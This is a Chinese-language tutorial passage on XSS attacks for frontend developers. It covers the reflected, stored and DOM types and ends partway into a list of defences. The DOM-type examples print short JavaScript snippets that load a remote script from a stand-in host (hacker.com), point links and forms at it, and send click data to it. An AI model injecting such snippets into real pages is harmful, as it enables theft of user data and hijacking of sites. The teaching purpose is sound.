• 前端网络---网络安全


    「前端食堂」想进大厂必须要知道的Web安全问题 - 掘金

    网络安全之xss攻击

    XSS 攻击是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。

    XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。

    黑客利用xss攻击可能做的事情

    1、获取页面的数据,例如,dom、cookie、localStorage

    2、dos攻击。发送合理请求,占用服务器资源,使用户无法访问服务器

    3、破坏页面结构

    4、流量劫持,将链接指向某个网站

    xss攻击可以分为反射型、存储型、DOM型

    反射型

    恶意 JavaScript 脚本属于用户发送给网站请求中的一部分,随后网站又将这部分返回给用户,恶意脚本在页面中被执行。一般发生在前后端一体的应用中,服务端逻辑会改变最终的网页代码。

    会和后段有交互

    存储型

    黑客将恶意 JavaScript 脚本长期保存在服务端数据库中,用户一旦访问相关页面数据,恶意脚本就会被执行。常见于搜索、微博、社区贴吧评论等。会和后段有交互

    DOM型

    黑客将恶意 JavaScript 脚本注入到web应用程序中,通常是指攻击者通过操作页面的DOM对象模型来改变页面的内容或行为,从而可能实施攻击。仅仅发生在前端

    xss攻击的案例

    反射型攻击的案例

    正常发送消息:

    http://www.test.com/message.php?send=Hello,World!

    接收者将会接收信息并显示Hello,Word

    非正常发送消息:

    http://www.test.com/message.php?send=

    接收者接收消息显示的时候将会弹出警告窗口

    试想如果不是弹出弹窗而是获取你的cookie或者任何的登录标识呢?是不是就可以拿到你的信息来做一些事情呢?

    存储型攻击的案例

    比如用户评论功能,输入一段脚本,并提交保存到服务器,由于评论具有公开性,是不是每一个进入到该网站查看评论都可以被攻击?

    DOM型攻击的案例

    1. var script = document.createElement('script');
    2. script.src = 'http://hacker.com/malicious-code.js';
    3. document.head.appendChild(script);
    1. document.querySelector('a').href = 'http://hacker.com';
    2. document.querySelector('form').action = 'http://hacker.com';
    1. document.addEventListener('click', function(event) {
    2. // 发送数据到恶意网址
    3. var xhr = new XMLHttpRequest();
    4. xhr.open('POST', 'http://hacker.com/log-clicks', true);
    5. xhr.send('x=' + event.clientX + '&y=' + event.clientY);
    6. });

    比如以上代码,通过操作dom,或者监听用户的点击动作,可以添加一些有害脚本

    xss三种攻击类型的区别

    1、反射型的攻击存在URL中

    2、存储型的攻击存在数据库中

    3、DOM型的攻击主要利用web端的代码漏洞,使浏览器执行恶意代码,属于js的漏洞

    xss攻击防范方法

    1、输入格式校验

    2、过滤